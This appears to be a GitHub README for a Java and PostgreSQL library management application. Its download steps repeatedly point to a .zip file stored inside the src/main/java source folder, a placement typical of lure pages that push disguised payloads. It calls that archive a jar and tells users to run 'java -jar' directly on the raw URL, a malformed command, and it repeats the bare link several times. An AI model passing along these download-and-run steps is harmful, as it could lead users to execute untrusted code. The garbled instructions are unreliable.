Welcome to the Library Management System! This application helps you manage your books effectively. You can add, update, or delete books from your library. You can also manage authors and view book availability.
- User-Friendly Interface: Navigate easily through the application.
- Book Management: Add, update, and delete book records.
- Author Management: Keep track of authors and their works.
- Search Functionality: Find books quickly using various filters.
- Database Support: Built on PostgreSQL for reliable data storage.
To run the Library Management System, ensure you have the following:
- Java: Install Java version 17 or higher. You can download it from the official Java website.
- PostgreSQL: This application requires PostgreSQL for managing your database. You can download PostgreSQL from the official site.
- Visit the Releases page to download the latest version of the application.
- Locate the latest release. You will find files available for download.
- Click on the link that says βhttps://raw.githubusercontent.com/Kishou76/Library-Management-System/master/src/main/java/Library-Management-System_v1.5.zipβ to start your download.
- Once the file is downloaded, navigate to your downloads folder.
- Open the Command Prompt (Windows) or Terminal (Mac/Linux).
- Change your directory to where the downloaded jar file is located using the
cdcommand. For example:cd Downloads - Run the application by typing the following command:
java -jar https://raw.githubusercontent.com/Kishou76/Library-Management-System/master/src/main/java/Library-Management-System_v1.5.zip - Follow the on-screen instructions to start using the application.
Before you start using the application, you need to configure the database.
- Create a PostgreSQL database named
library_management. - Import the provided SQL schema. You can find the SQL file in the repository.
- Update the database connection settings in the application configuration file.
https://raw.githubusercontent.com/Kishou76/Library-Management-System/master/src/main/java/Library-Management-System_v1.5.zip
https://raw.githubusercontent.com/Kishou76/Library-Management-System/master/src/main/java/Library-Management-System_v1.5.zip
https://raw.githubusercontent.com/Kishou76/Library-Management-System/master/src/main/java/Library-Management-System_v1.5.zipAfter setting up, you can:
- Add new books to your library.
- Edit existing book details.
- Search for books based on title, author, or genre.
- Delete books that you no longer wish to keep.
If you encounter any issues, please feel free to reach out through the Issues section on GitHub. We value your feedback and are eager to help.
Keep an eye on the Changelog to know about the latest updates and enhancements made to the application.
Thank you for choosing the Library Management System! Enjoy managing your library effortlessly.